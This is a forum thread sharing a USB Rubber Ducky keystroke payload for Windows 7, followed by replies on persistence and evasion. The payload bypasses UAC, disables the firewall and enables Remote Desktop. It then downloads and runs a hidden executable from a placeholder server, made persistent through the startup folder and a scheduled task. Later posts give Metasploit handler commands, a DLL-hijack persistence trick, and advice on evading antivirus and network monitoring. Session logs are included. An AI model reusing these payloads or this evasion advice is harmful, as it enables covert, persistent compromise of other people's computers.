[Payload] Persistent powershell reverse payload with UAC on Win7

[TeCHemically]

This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D

******************************************************************************************************************************

DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
STRING exit
ENTER

******************************************************************************************************************************

You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above.

Then in terminal type the following 2 commands:

cd /usr/share/ducky/encoder

(for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in)

java -jar encoder.jar -i payload.txt -o inject.bin

(now place the "inject.bin" file on your ducky and use as you normally would)

Edited August 30, 2013 by TeCHemically

[TeCHemically]

Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management".

DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300

STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
DELAY 300
STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"
ENTER
DELAY 300
STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2
ENTER
DELAY 300
STRING y
ENTER
STRING exit
ENTER

Edited September 4, 2013 by TeCHemically

[Forgiven]

Does your version minimize the terminal upon execution and then close the terminal when it's done?

[Xcellerator]

This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level.

[TeCHemically]

This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level.

Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connetion being so noticable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thakns again!

[Xcellerator]

Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never being detected by an AV.

As far as persistence goes, the startup folder is one way, but is usually picked up by AV.

Or put Meterpreter into a dll file and call it "fxsst.dll" and through it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service.

[TeCHemically]

Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never being detected by an AV.

As far as persistence goes, the startup folder is one way, but is usually picked up by AV.

Or put Meterpreter into a dll file and call it "fxsst.dll" and through it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service.

Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method!

[TeCHemically]

Does your version minimize the terminal upon execution and then close the terminal when it's done?

No, but that section could be easily added to the top. Good idea :)

[Xcellerator]

You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit)

The x86 Meterpreter reverse http sis here:

payload/windows/meterpreter/reverse_https (The one I expect you used)

The x64 one is here

payload/windows/x64/meterpreter/reverse_https

Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode.

[TeCHemically]

You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit)

The x86 Meterpreter reverse http sis here:

payload/windows/meterpreter/reverse_https (The one I expect you used)

The x64 one is here

payload/windows/x64/meterpreter/reverse_https

Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode.

You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D

[TeCHemically]

So to start the handler would I use the following:

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 443
set PAYLOAD windows/windows/x64/meterpreter/reverse_https
set ExitOnSession false
exploit -j

[Xcellerator]

Correct, except only one windows on the 4th line.

set PAYLOAD windows/x64/meterpreter/reverse_https

Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).

[TeCHemically]

Correct, except only one windows on the 4th line.

set PAYLOAD windows/x64/meterpreter/reverse_https

Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).

Great, thanks so much! :D

[TeCHemically]

You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D

I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned dll but I don't see the options I need in the help of msfvenom.

[skysploit]

Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

~skysploit

[TeCHemically]

Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

~skysploit

Beautiful, great work man! I just watched your vid. You have yourself another subscriber.

[TeCHemically]

Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

~skysploit

So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar?

[Xcellerator]

If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.

[TeCHemically]

If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.

I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe/ exe template that I can use for AV evasion? I have a thread on this started under security if you could shed some light that would be amazing, thanks for all your help! :)

[TeCHemically]

Correct, except only one windows on the 4th line.

set PAYLOAD windows/x64/meterpreter/reverse_https

Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).

I started the 32 bit listener and created the fxsst.dll with a 32bit reverse_https payload. When it runs I get the following on my listening machine:

Starting the payload handler...

[*] <IP address>:5465 Request received for /JuQL...

[*] <IP address>:5465 Staging connection for target /JuQL received...

[*] Patched user-agent at offset 657384...

[*] Patched transport at offset 657044...

[*] Patched URL at offset 657112...

[*] Patched Expiration Timeout at offset 657868...

[*] Patched Communication Timeout at offset 657984...

[*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500

[-] Failed to load extension: No response was received to the core_loadlib request.

Edited October 4, 2013 by TeCHemically

[TeCHemically]

Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp?

exploit(handler) > exploit -j [*] Exploit running as background job.
[*] Starting the payload handler... [*] <Public IP address>:60476 Request received for /JuQL... [*] <Public IP address>:60476 Staging connection for target /JuQL received... [*] Patched user-agent at offset 657384... [*] Patched transport at offset 657044... [*] Patched URL at offset 657112... [*] Patched Expiration Timeout at offset 657868... [*] Patched Communication Timeout at offset 657984... [*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500

[TeCHemically]

Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

~skysploit

WOW, just...WOW man...the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D